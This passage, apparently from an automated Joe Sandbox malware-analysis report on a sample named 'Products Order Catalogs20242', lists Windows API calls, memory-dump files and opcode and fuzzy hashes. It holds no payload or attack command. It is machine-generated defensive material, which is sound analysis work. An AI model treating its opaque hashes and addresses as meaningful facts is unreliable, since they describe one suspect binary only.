                                                                                                • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                • DrawMenuBar.USER32 ref: 00455207
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 1663942905-4108050209
                                                                                                • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1481289235-0
                                                                                                • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                • SendMessageW.USER32 ref: 0046FBAF
                                                                                                • SendMessageW.USER32 ref: 0046FBE2
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                • String ID:
                                                                                                • API String ID: 2632138820-0
                                                                                                • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CursorLoad
                                                                                                • String ID:
                                                                                                • API String ID: 3238433803-0
                                                                                                • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                • _wcslen.LIBCMT ref: 00460B00
                                                                                                • __swprintf.LIBCMT ref: 00460B9E
                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                • GetParent.USER32(?), ref: 00460D40
                                                                                                • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                • String ID: %s%u
                                                                                                • API String ID: 1899580136-679674701
                                                                                                • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                APIs
                                                                                                • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                • API String ID: 2485709727-934586222
                                                                                                • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                • String ID: HH
                                                                                                • API String ID: 3381189665-2761332787
                                                                                                • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 00434585
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                • String ID: (
                                                                                                • API String ID: 3300687185-3887548279
                                                                                                • Opcode ID: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                • Opcode Fuzzy Hash: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                • _printf.LIBCMT ref: 0045E595
                                                                                                • _printf.LIBCMT ref: 0045E5B7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                • API String ID: 3590180749-2894483878
                                                                                                • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3412594756-0
                                                                                                • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                APIs
                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                • API String ID: 4013263488-4113822522
                                                                                                • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                • String ID:
                                                                                                • API String ID: 228034949-0
                                                                                                • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                • DeleteObject.GDI32(?), ref: 00433603
                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 3969911579-0
                                                                                                • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                APIs
                                                                                                • GetParent.USER32 ref: 00445A8D
                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
